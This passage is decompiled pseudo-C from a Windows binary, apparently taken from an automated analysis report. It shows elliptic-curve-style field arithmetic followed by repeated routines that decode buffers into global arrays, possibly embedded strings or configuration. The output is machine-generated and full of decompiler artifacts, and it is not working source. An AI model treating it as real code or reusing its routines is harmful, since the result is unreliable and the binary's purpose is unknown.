				_t2734 = (_t2732 ^ _t3852) &  ~0xf3102d44;
				_t3108 =  *(_t3601 + 0x2e8);
				_t2380 =  *(_t3601 + 0xd8);
				 *(_t3601 + 0x80) = _t2380;
				_t2382 = (_t2380 ^ _t3108) &  ~0xf3102d44;
				 *(_t3601 + 0x2a0) =  *(_t3601 + 0x320) ^  *(_t3601 + 0x198);
				 *(_t3601 + 0x2a8) =  *(_t3601 + 0x318) ^ _t3325;
				 *(_t3601 + 0x2b0) =  *(_t3601 + 0x308) ^ _t3576;
				 *(_t3601 + 0x2b8) =  *(_t3601 + 0x358) ^ _t3913;
				_t3886 =  *(_t3601 + 0x148) ^ _t3870;
				 *(_t3601 + 0x2c0) = _t3886;
				 *(_t3601 + 0x2c8) =  *(_t3601 + 0x88) ^ _t3896;
				 *(_t3601 + 0x2d0) = _t3431 ^ _t3805;
				 *(_t3601 + 0x2d8) = _t3857 ^ _t3612;
				 *(_t3601 + 0x2e0) = _t3852 ^ _t2734;
				 *(_t3601 + 0x2e8) = _t3108 ^ _t2382;
				_t2383 = _t2382 ^  *(_t3601 + 0x80);
				 *(_t3601 + 0x90) =  *(_t3601 + 0x198) ^  *(_t3601 + 0x340);
				 *(_t3601 + 0x98) = _t3325 ^  *(_t3601 + 0x338);
				 *(_t3601 + 0xa0) = _t3576 ^  *(_t3601 + 0x330);
				 *(_t3601 + 0xa8) = _t3913 ^  *(_t3601 + 0x328);
				 *(_t3601 + 0xb0) = _t3870 ^  *(_t3601 + 0x310);
				 *(_t3601 + 0xb8) = _t3896 ^  *(_t3601 + 0x300);
				 *(_t3601 + 0xc0) = _t3805 ^  *(_t3601 + 0x2f8);
				 *(_t3601 + 0xc8) = _t3612 ^  *(_t3601 + 0x118);
				 *(_t3601 + 0xd0) = _t2734 ^  *(_t3601 + 0x110);
				 *(_t3601 + 0xd8) = _t2383;
				 *(_t3601 + 0x600) = _t3886;
				asm("movups xmm0, [esp+0x2b0]");
				asm("movaps [esp+0x5f0], xmm0");
				asm("movups xmm0, [esp+0x2a0]");
				asm("movaps [esp+0x5e0], xmm0");
				 *((intOrPtr*)(_t3601 + 0x5e0 + _t2383 * 8)) =  *((intOrPtr*)(_t3601 + 0x5e0 + _t2383 * 8)) +  *((intOrPtr*)(_t3601 + 0x2c8 + _t2383 * 8));
				_t444 = _t2383 + 1; // 0x1
				if (_t444 != 5) goto 0xf3046aad;
				E000007FE7FEF30599A4(0, _t3601 + 0x730, _t3601 + 0x2a0, _t3601 + 0x2c8);
				_t2385 =  *(_t3601 + 0xb0);
				 *(_t3601 + 0x630) = _t2385;
				asm("movaps xmm0, [esp+0x90]");
				asm("movaps xmm1, [esp+0xa0]");
				asm("movaps [esp+0x620], xmm1");
				asm("movaps [esp+0x610], xmm0");
				 *((intOrPtr*)(_t3601 + 0x610 + _t2385 * 8)) =  *((intOrPtr*)(_t3601 + 0x610 + _t2385 * 8)) +  *((intOrPtr*)(_t3601 + 0xb8 + _t2385 * 8));
				_t464 = _t2385 + 1; // 0x1
				if (_t464 != 5) goto 0xf3046b44;
				_t1462 = E000007FE7FEF30599A4(0, _t3601 + 0x758, _t3601 + 0x90, _t3601 + 0xb8);
				r8d = 1;
				_t1463 = E000007FE7FEF3059E4D(_t1462, _t3601 + 0x780, _t3601 + 0x5e0);
				r8d = 1;
				E000007FE7FEF3059A5C(E000007FE7FEF3059A5C(E000007FE7FEF30599A4(E000007FE7FEF3059E4D(_t1463, _t3601 + 0x6b8, _t3601 + 0x730), _t3601 + 0x7a8, _t3601 + 0x780, _t3601 + 0x6b8), _t3601 + 0x668, _t3601 + 0x5e0, _t3601 + 0x758), _t3601 + 0x6e0, _t3601 + 0x730, _t3601 + 0x610);
				_t2387 =  *((intOrPtr*)(_t3601 + 0x688));
				 *(_t3601 + 0x660) = _t2387;
				asm("movups xmm0, [esp+0x668]");
				asm("movups xmm1, [esp+0x678]");
				asm("movaps [esp+0x650], xmm1");
				asm("movaps [esp+0x640], xmm0");
				 *((intOrPtr*)(_t3601 + 0x640 + _t2387 * 8)) =  *((intOrPtr*)(_t3601 + 0x640 + _t2387 * 8)) +  *((intOrPtr*)(_t3601 + 0x6e0 + _t2387 * 8));
				_t481 = _t2387 + 1; // 0x1
				if (_t481 != 5) goto 0xf3046c0f;
				_t1469 = E000007FE7FEF30599A4(0, _t3601 + 0x7d0, _t3601 + 0x668, _t3601 + 0x6e0);
				r8d = 1;
				_t1470 = E000007FE7FEF3059E4D(_t1469, _t3601 + 0x690, _t3601 + 0x640);
				r8d = 1;
				E000007FE7FEF3059A5C(E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1470, _t3601 + 0x708, _t3601 + 0x7d0), _t3601 + 0x120, 0xf310fa38, _t3601 + 0x7a8), _t3601 + 0xe0, _t3601 + 0x780, _t3601 + 0x6b8);
				_t2389 =  *((intOrPtr*)(_t3601 + 0x140));
				 *(_t3601 + 0x380) = _t2389;
				asm("movups xmm0, [esp+0x120]");
				asm("movups xmm1, [esp+0x130]");
				asm("movaps [esp+0x370], xmm1");
				asm("movaps [esp+0x360], xmm0");
				 *((intOrPtr*)(_t3601 + 0x360 + _t2389 * 8)) =  *((intOrPtr*)(_t3601 + 0x360 + _t2389 * 8)) +  *((intOrPtr*)(_t3601 + 0x6b8 + _t2389 * 8));
				_t499 = _t2389 + 1; // 0x1
				if (_t499 != 5) goto 0xf3046cd2;
				E000007FE7FEF3059A5C(E000007FE7FEF3059A5C(0, _t3601 + 0x2c8, _t3601 + 0x7a8, _t3601 + 0x360), _t3601 + 0xb8, _t3601 + 0x3c8, _t3601 + 0x708);
				 *(_t3601 + 0x2c0) =  *((intOrPtr*)(_t3601 + 0x100));
				asm("movups xmm0, [esp+0xe0]");
				asm("movups xmm1, [esp+0xf0]");
				asm("movaps [esp+0x2b0], xmm1");
				asm("movaps [esp+0x2a0], xmm0");
				asm("movups xmm0, [esp+0x690]");
				asm("movups xmm1, [esp+0x6a0]");
				asm("movaps [esp+0x90], xmm0");
				asm("movaps [esp+0xa0], xmm1");
				 *(_t3601 + 0xb0) =  *((intOrPtr*)(_t3601 + 0x6b0));
				_t2393 =  *((intOrPtr*)(_t3601 + 0x350));
				if (_t2393 != 0) goto 0xf30467ad;
				_t1793 =  *((intOrPtr*)(_t3601 + 0x1a0));
				_t1477 = E000007FE7FEF30A60AD(_t1793, _t2393);
				_t3888 = _t3601 + 0x2a0;
				_t2394 =  ~_t2393;
				 *_t3888 = ( *(_t3601 + 0x90) ^  *_t3888) & _t2394 ^  *_t3888;
				_t3888[2] = ( *(_t3601 + 0x98) ^ _t3888[2]) & _t2394 ^ _t3888[2];
				_t3888[4] = ( *(_t3601 + 0xa0) ^ _t3888[4]) & _t2394 ^ _t3888[4];
				_t3888[6] = ( *(_t3601 + 0xa8) ^ _t3888[6]) & _t2394 ^ _t3888[6];
				_t3888[8] = ( *(_t3601 + 0xb0) ^ _t3888[8]) & _t2394 ^ _t3888[8];
				_t3888[0xa] = ( *(_t3601 + 0xb8) ^ _t3888[0xa]) & _t2394 ^ _t3888[0xa];
				_t3888[0xc] = ( *(_t3601 + 0xc0) ^ _t3888[0xc]) & _t2394 ^ _t3888[0xc];
				_t3888[0xe] = ( *(_t3601 + 0xc8) ^ _t3888[0xe]) & _t2394 ^ _t3888[0xe];
				_t3888[0x10] = ( *(_t3601 + 0xd0) ^ _t3888[0x10]) & _t2394 ^ _t3888[0x10];
				_t3888[0x12] = ( *(_t3601 + 0xd8) ^ _t3888[0x12]) & _t2394 ^ _t3888[0x12];
				r8d = 1;
				_t1479 = E000007FE7FEF3059E4D(_t1477 & 0x000000ff, _t3601 + 0x170, _t3601 + 0x2c8);
				r8d = 1;
				_t1480 = E000007FE7FEF3059E4D(_t1479, _t3601 + 0x360, _t3601 + 0x170);
				r8d = 1;
				_t1482 = E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1480, _t3601 + 0x7f8, _t3601 + 0x360), _t3601 + 0x820, _t3601 + 0x2c8, _t3601 + 0x7f8);
				_t3904 = _t3601 + 0x848;
				_t1483 = E000007FE7FEF3059A5C(_t1482, _t3904, _t3601 + 0x170, _t3601 + 0x820);
				r8d = 1;
				_t1485 = E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1483, _t3601 + 0x5e0, _t3904), _t3601 + 0x730, _t3601 + 0x820, _t3601 + 0x5e0);
				r8d = 5;
				_t1487 = E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1485, _t3601 + 0x610, _t3601 + 0x730), _t3601 + 0x758, _t3601 + 0x610, _t3601 + 0x730);
				r8d = 0xa;
				_t1489 = E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1487, _t3601 + 0x780, _t3601 + 0x758), _t3601 + 0x6b8, _t3601 + 0x780, _t3601 + 0x758);
				r8d = 0x14;
				_t1491 = E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1489, _t3601 + 0x7a8, _t3601 + 0x6b8), _t3601 + 0x668, _t3601 + 0x7a8, _t3601 + 0x6b8);
				r8d = 0xa;
				_t1493 = E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1491, _t3601 + 0x6e0, _t3601 + 0x668), _t3601 + 0x640, _t3601 + 0x6e0, _t3601 + 0x758);
				r8d = 0x32;
				_t1495 = E000007FE7FEF3059A5C(E000007FE7FEF3059E4D(_t1493, _t3601 + 0x7d0, _t3601 + 0x640), _t3601 + 0x690, _t3601 + 0x7d0, _t3601 + 0x640);
				r8d = 0x64;
				_t1496 = E000007FE7FEF3059E4D(_t1495, _t3601 + 0x708, _t3601 + 0x690);
				_t2622 = _t3601 + 0x120;
				_t1497 = E000007FE7FEF3059A5C(_t1496, _t2622, _t3601 + 0x708, _t3601 + 0x690);
				_t3342 = _t3601 + 0xe0;
				r8d = 0x32;
				_t1498 = E000007FE7FEF3059E4D(_t1497, _t3342, _t2622);
				_t3588 = _t3601 + 0x360;
				_t1499 = E000007FE7FEF3059A5C(_t1498, _t3588, _t3342, _t3601 + 0x640);
				 *((long long*)(_t3588 + 0x48)) =  *((intOrPtr*)(_t3904 + 0x20));
				asm("inc ecx");
				asm("inc ecx");
				asm("movups [ebp+0x38], xmm1");
				asm("movups [ebp+0x28], xmm0");
				 *((long long*)(_t2622 + 0x20)) =  *((intOrPtr*)(_t3588 + 0x20));
				asm("movups xmm0, [ebp]");
				asm("movups xmm1, [ebp+0x10]");
				asm("movaps [ebx+0x10], xmm1");
				asm("movaps [ebx], xmm0");
				 *((long long*)(_t3342 + 0x20)) =  *((intOrPtr*)(_t3588 + 0x48));
				asm("movups xmm0, [ebp+0x28]");
				asm("movups xmm1, [ebp+0x38]");
				asm("movaps [edi+0x10], xmm1");
				asm("movaps [edi], xmm0");
				r8d = 5;
				_t1500 = E000007FE7FEF3059E4D(_t1499, _t3601 + 0x360, _t3601 + 0x120);
				_t3905 = _t3601 + 0xe0;
				_t1501 = E000007FE7FEF3059A5C(_t1500, _t3601 + 0x708, _t3601 + 0x360, _t3905);
				_t2624 = _t3601 + 0x360;
				_t1502 = E000007FE7FEF3059A5C(_t1501, _t2624, _t3888, _t3601 + 0x708);
				_t2787 =  *_t2624;
				_t3343 =  *((intOrPtr*)(_t2624 + 8));
				_t3864 =  *((intOrPtr*)(_t2624 + 0x10));
				_t3637 =  *((intOrPtr*)(_t2624 + 0x18));
				_t3808 =  *((intOrPtr*)(_t2624 + 0x20));
				_t3345 = (_t3343 & 0xffffffff) + (_t2787 >> 0x33);
				_t3866 = (_t3864 & 0xffffffff) + (_t3343 >> 0x33);
				_t3639 = (_t3637 & 0xffffffff) + (_t3864 >> 0x33);
				_t2628 = ((((((_t3808 >> 0x33) + ((_t3808 >> 0x33) + (_t3808 >> 0x33) * 8) * 2 + (_t2787 & 0xffffffff) + 0x13 >> 0x33) + _t3345 >> 0x33) + _t3866 >> 0x33) + _t3639 >> 0x33) + (_t3808 & 0xffffffff) + (_t3637 >> 0x33) >> 0x33) + (((((((_t3808 >> 0x33) + ((_t3808 >> 0x33) + (_t3808 >> 0x33) * 8) * 2 + (_t2787 & 0xffffffff) + 0x13 >> 0x33) + _t3345 >> 0x33) + _t3866 >> 0x33) + _t3639 >> 0x33) + (_t3808 & 0xffffffff) + (_t3637 >> 0x33) >> 0x33) + ((((((_t3808 >> 0x33) + ((_t3808 >> 0x33) + (_t3808 >> 0x33) * 8) * 2 + (_t2787 & 0xffffffff) + 0x13 >> 0x33) + _t3345 >> 0x33) + _t3866 >> 0x33) + _t3639 >> 0x33) + (_t3808 & 0xffffffff) + (_t3637 >> 0x33) >> 0x33) * 8) * 2 + (_t3808 >> 0x33) + ((_t3808 >> 0x33) + (_t3808 >> 0x33) * 8) * 2 + (_t2787 & 0xffffffff);
				_t2792 = (_t2628 >> 0x33) + _t3345;
				 *_t3905 = _t1713;
				 *(_t3601 + 0xe1) = _t1713;
				_t3905[0] = _t1829;
				_t3905[0] = _t1829;
				_t3905[1] = _t1829;
				_t3905[1] = _t1829;
				_t2629 = _t2628 >> 0x30;
				_t1830 = _t2629 + _t2792 * 8;
				_t3905[1] = _t1830;
				_t3905[1] = _t1830;
				_t3905[2] = _t1830;
				_t3905[2] = _t1830;
				_t3905[2] = _t1830;
				_t3905[2] = _t1830;
				_t1794 = _t1793 & 0x0000003f;
				_t3905[3] = _t1502 << 0x00000006 | _t1794;
				_t3905[3] = _t1794;
				_t3905[3] = _t1794;
				_t3905[3] = _t1794;
				_t3905[4] = _t1794;
				_t3905[4] = _t1794;
				_t3905[4] = _t1794;
				_t1504 = ((_t2792 >> 0x33) + _t3866 >> 0x32) + (((_t2792 >> 0x33) + _t3866 >> 0x33) + _t3639) * 2;
				_t3905[4] = _t1504;
				_t3905[5] = _t1504;
				_t3905[5] = _t1504;
				_t3905[5] = _t1504;
				_t3905[5] = _t1504;
				_t3905[6] = _t1504;
				_t1507 = 0 << 0x00000004 |  *(_t3601 + 0x163) & 0xf;
				_t3905[6] = _t1507;
				_t3905[6] = _t1507;
				_t3905[6] = _t1507;
				_t3905[7] = _t1507;
				_t3905[7] = _t1507;
				_t3905[7] = _t1507;
				_t3905[7] = sil;
				asm("inc ecx");
				_t2437 = _t3905[4];
				 *((long long*)(_t3601 + 0x420)) = _t2437;
				 *((short*)(_t3601 + 0x428)) = _t3905[6] & 0x0000ffff;
				 *((char*)(_t3601 + 0x42a)) = _t3905[6];
				 *((char*)(_t3601 + 0x42b)) = _t3905[6];
				 *((char*)(_t3601 + 0x42c)) = _t3905[7];
				 *((char*)(_t3601 + 0x42d)) = _t3905[7];
				 *((char*)(_t3601 + 0x42e)) = _t3905[7];
				 *((char*)(_t3601 + 0x42f)) = _t3905[7];
				asm("movaps [esp+0x410], xmm0");
				 *((char*)(_t3601 + _t2437 + 0xe0)) = 0;
				if (_t2437 + 1 != 0x20) goto 0xf30473cb;
				_t3175 = _t3601 + 0x1a0;
				 *_t3175 =  *((intOrPtr*)(_t3601 + 0x58));
				 *((long long*)(_t3175 + 8)) =  *(_t3601 + 0x50);
				 *((long long*)(_t3175 + 0x10)) = 0xb0;
				E000007FE7FEF304329C();
				if ( *((intOrPtr*)(_t3601 + 0x360)) == 0) goto 0xf304a9f1;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x3c8,  *((intOrPtr*)(_t3601 + 0x360)),  *((intOrPtr*)(_t3601 + 0x370)),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *((intOrPtr*)(_t3601 + 0x368)) == 0) goto 0xf304746f;
				HeapFree(??, ??, ??);
				asm("movaps xmm0, [esp+0x410]");
				asm("movaps xmm1, [esp+0x420]");
				asm("movaps [esp+0x370], xmm1");
				asm("movaps [esp+0x360], xmm0");
				if ( *((intOrPtr*)(_t3601 + 0x3c0)) - 0x1a <= 0) goto 0xf304aa11;
				_t2809 =  *((intOrPtr*)( *((intOrPtr*)(_t3601 + 0x3b0)) + 0x13));
				asm("movups xmm0, [eax+0x3]");
				asm("movaps [esp+0x170], xmm0");
				 *((long long*)(_t3601 + 0x180)) = _t2809;
				 *((long long*)(_t3601 + 0x2b0)) = _t2809;
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *(_t3601 + 0x3d8);
				_t3449 = _t3601 + 0xe0;
				E000007FE7FEF3041208(__esp,  *(_t3601 + 0x3d8), _t3449, _t3601 + 0x360, _t3601 + 0x2a0,  *(_t3601 + 0x3c8));
				_t3889 =  *_t3449;
				if (_t3889 == 0) goto 0xf3049d5d;
				 *(_t3601 + 0x358) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3347 =  *((intOrPtr*)(_t3601 + 0xf0));
				if (_t3347 == 0) goto 0xf3047578;
				_t3179 =  *0xf319c028; // 0x73
				bpl =  *((intOrPtr*)(_t3889 + _t2629));
				_t2021 = _t3179 -  *0xf319c020; // 0x80
				if (_t2021 != 0) goto 0xf3047554;
				E000007FE7FEF306953C(_t2021, 0xf319c018, _t3179);
				_t3180 =  *0xf319c028; // 0x73
				_t2445 =  *0xf319c018; // 0x346ef0
				 *((intOrPtr*)(_t2445 + _t3180)) = bpl;
				_t3181 =  *0xf319c028; // 0x73
				 *0xf319c028 = _t3181 + 1;
				_t2630 = _t2629 + 1;
				if (_t3347 != _t2630) goto 0xf3047537;
				_t3183 = _t3601 + 0x1a0;
				 *_t3183 =  *((intOrPtr*)(_t3601 + 0x5d8));
				 *((long long*)(_t3183 + 8)) =  *((intOrPtr*)(_t3601 + 0x540));
				 *((long long*)(_t3183 + 0x10)) = 0x58;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aa24;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x7f8,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf30475f1;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x808));
				_t3453 = _t3601 + 0xe0;
				E000007FE7FEF3041208(__esp,  *((intOrPtr*)(_t3601 + 0x808)), _t3453, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x7f8)));
				_t2816 =  *_t3453;
				_t2025 = _t2816;
				r15b = _t2025 == 0;
				if (_t2025 == 0) goto 0xf3049e23;
				 *((long long*)(_t3601 + 0x48)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3349 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *((long long*)(_t3601 + 0x350)) = _t2816;
				if (_t3349 == 0) goto 0xf30476c8;
				_t3186 =  *0xf319c010; // 0x32
				bpl =  *((intOrPtr*)(_t2816 + _t2630));
				_t2027 = _t3186 -  *0xf319c008; // 0x40
				if (_t2027 != 0) goto 0xf30476a4;
				E000007FE7FEF306953C(_t2027, 0xf319c000, _t3186);
				_t3187 =  *0xf319c010; // 0x32
				_t2450 =  *0xf319c000; // 0x3391d0
				 *((intOrPtr*)(_t2450 + _t3187)) = bpl;
				_t3188 =  *0xf319c010; // 0x32
				 *0xf319c010 = _t3188 + 1;
				_t2631 = _t2630 + 1;
				if (_t3349 != _t2631) goto 0xf3047680;
				_t3190 = _t3601 + 0x1a0;
				 *_t3190 =  *((intOrPtr*)(_t3601 + 0x5a8));
				 *((long long*)(_t3190 + 8)) =  *((intOrPtr*)(_t3601 + 0x5d0));
				 *((long long*)(_t3190 + 0x10)) = 0x18;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aa44;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x820,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3047751;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x830));
				_t3457 = _t3601 + 0xe0;
				E000007FE7FEF3041208(__esp,  *((intOrPtr*)(_t3601 + 0x830)), _t3457, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x820)));
				_t2823 =  *_t3457;
				_t2031 = _t2823;
				bpl = _t2031 == 0;
				if (_t2031 == 0) goto 0xf3049ee6;
				 *((intOrPtr*)(_t3601 + 0x2e)) = bpl;
				 *((long long*)(_t3601 + 0x40)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3351 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x348) = _t2823;
				if (_t3351 == 0) goto 0xf304782d;
				_t3193 =  *0xf319c058; // 0x2
				bpl =  *((intOrPtr*)(_t2823 + _t2631));
				_t2033 = _t3193 -  *0xf319c050; // 0x8
				if (_t2033 != 0) goto 0xf3047809;
				E000007FE7FEF306953C(_t2033, 0xf319c048, _t3193);
				_t3194 =  *0xf319c058; // 0x2
				_t2457 =  *0xf319c048; // 0x346040
				 *((intOrPtr*)(_t2457 + _t3194)) = bpl;
				_t3195 =  *0xf319c058; // 0x2
				 *0xf319c058 = _t3195 + 1;
				_t2632 = _t2631 + 1;
				if (_t3351 != _t2632) goto 0xf30477e5;
				_t3197 = _t3601 + 0x1a0;
				 *_t3197 =  *(_t3601 + 0x598);
				 *((long long*)(_t3197 + 8)) =  *((intOrPtr*)(_t3601 + 0x5c8));
				 *((long long*)(_t3197 + 0x10)) = 0x40;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aa64;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x848,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf30478b6;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x858));
				_t3461 = _t3601 + 0xe0;
				E000007FE7FEF3041208(__esp,  *((intOrPtr*)(_t3601 + 0x858)), _t3461, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x848)));
				_t2830 =  *_t3461;
				_t2037 = _t2830;
				 *((char*)(_t3601 + 0x37)) = _t2037 == 0;
				if (_t2037 == 0) goto 0xf3049fb0;
				 *((long long*)(_t3601 + 0x4b8)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3353 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x340) = _t2830;
				if (_t3353 == 0) goto 0xf3047991;
				_t3200 =  *0xf319c040; // 0x20
				bpl =  *((intOrPtr*)(_t2830 + _t2632));
				_t2039 = _t3200 -  *0xf319c038; // 0x20
				if (_t2039 != 0) goto 0xf304796d;
				E000007FE7FEF306953C(_t2039, 0xf319c030, _t3200);
				_t3201 =  *0xf319c040; // 0x20
				_t2464 =  *0xf319c030; // 0x346650
				 *((intOrPtr*)(_t2464 + _t3201)) = bpl;
				_t3202 =  *0xf319c040; // 0x20
				 *0xf319c040 = _t3202 + 1;
				_t2633 = _t2632 + 1;
				if (_t3353 != _t2633) goto 0xf3047949;
				_t3204 = _t3601 + 0x1a0;
				 *_t3204 =  *(_t3601 + 0x580);
				 *((long long*)(_t3204 + 8)) =  *((intOrPtr*)(_t3601 + 0x5c0));
				 *((long long*)(_t3204 + 0x10)) = 0x20;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aa84;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x5e0,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3047a1a;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x5f0));
				_t3465 = _t3601 + 0xe0;
				E000007FE7FEF3041208(__esp,  *((intOrPtr*)(_t3601 + 0x5f0)), _t3465, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x5e0)));
				_t3879 =  *_t3465;
				_t2043 = _t3879;
				 *((char*)(_t3601 + 0x36)) = _t2043 == 0;
				if (_t2043 == 0) goto 0xf304a07d;
				 *((long long*)(_t3601 + 0x4b0)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3355 =  *((intOrPtr*)(_t3601 + 0xf0));
				if (_t3355 == 0) goto 0xf3047ae5;
				_t3207 =  *0xf319c070; // 0x8
				bpl =  *((intOrPtr*)(_t3879 + _t2633));
				_t2045 = _t3207 -  *0xf319c068; // 0x8
				if (_t2045 != 0) goto 0xf3047ac1;
				E000007FE7FEF306953C(_t2045, 0xf319c060, _t3207);
				_t3208 =  *0xf319c070; // 0x8
				_t2471 =  *0xf319c060; // 0x346050
				 *((intOrPtr*)(_t2471 + _t3208)) = bpl;
				_t3209 =  *0xf319c070; // 0x8
				 *0xf319c070 = _t3209 + 1;
				_t2634 = _t2633 + 1;
				if (_t3355 != _t2634) goto 0xf3047aa5;
				_t3211 = _t3601 + 0x1a0;
				 *_t3211 =  *(_t3601 + 0x570);
				 *((long long*)(_t3211 + 8)) =  *((intOrPtr*)(_t3601 + 0x5b8));
				 *((long long*)(_t3211 + 0x10)) = 0x24;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aaa4;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x730,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3047b6e;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x740));
				_t3469 = _t3601 + 0xe0;
				E000007FE7FEF3041208(__esp,  *((intOrPtr*)(_t3601 + 0x740)), _t3469, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x730)));
				_t2842 =  *_t3469;
				_t2049 = _t2842;
				 *(_t3601 + 0x35) = _t2049 == 0;
				if (_t2049 == 0) goto 0xf304a14d;
				 *((long long*)(_t3601 + 0x4a8)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3357 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x198) = _t2842;
				if (_t3357 == 0) goto 0xf3047ca5;
				_t3214 =  *0xf319c088; // 0xa
				bpl =  *((intOrPtr*)(_t2842 + _t2634));
				_t2051 = _t3214 -  *0xf319c080; // 0x10
				if (_t2051 != 0) goto 0xf3047c29;
				E000007FE7FEF306953C(_t2051, 0xf319c078, _t3214);
				_t3215 =  *0xf319c088; // 0xa
				_t2478 =  *0xf319c078; // 0x3356b0
				 *((intOrPtr*)(_t2478 + _t3215)) = bpl;
				_t3216 =  *0xf319c088; // 0xa
				 *0xf319c088 = _t3216 + 1;
				_t2635 = _t2634 + 1;
				if (_t3357 != _t2635) goto 0xf3047c05;
				_t3218 =  *0xf319c0a0; // 0xa
				_t2053 = _t3218 -  *0xf319c098; // 0x10
				if (_t2053 != 0) goto 0xf3047c81;
				E000007FE7FEF3043262(_t3218);
				_t3219 =  *0xf319c0a0; // 0xa
				_t2479 =  *0xf319c090; // 0x346680
				 *((short*)(_t2479 + _t3219 * 2)) =  *( *(_t3601 + 0x198) + _t2635) & 0x000000ff;
				_t3220 =  *0xf319c0a0; // 0xa
				 *0xf319c0a0 = _t3220 + 1;
				_t2636 = _t2635 + 1;
				if (_t3357 != _t2636) goto 0xf3047c5d;
				_t3222 = _t3601 + 0x1a0;
				 *_t3222 =  *((intOrPtr*)(_t3601 + 0x558));
				 *((long long*)(_t3222 + 8)) =  *((intOrPtr*)(_t3601 + 0x5b0));
				 *((long long*)(_t3222 + 0x10)) = 0x24;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aac4;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x610,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
